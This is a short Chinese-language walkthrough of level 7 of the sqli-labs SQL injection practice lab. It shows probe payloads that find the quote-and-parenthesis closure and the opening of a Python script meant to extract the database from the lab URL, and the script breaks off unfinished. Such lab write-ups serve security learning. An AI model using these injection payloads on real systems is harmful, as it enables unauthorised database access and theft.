7、第七关
id=1' --+单引号报错,id=1" --+双引号不报错,可以判断是单引号闭合
id=1') --+也报错,尝试两个括号闭合,id=1')) --+不报错
接下来用脚本爆库
import string
import requests
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ['~', "@", "$", "^", "*", "(", ")", "-", "_", ",", ".", "/", "{", "}", "[", "]", ":", ";", "|"]
if __name__ == '__main__':
test = False
url = "http://sqli.labs/Less-7/?id=1%27))%20"
if te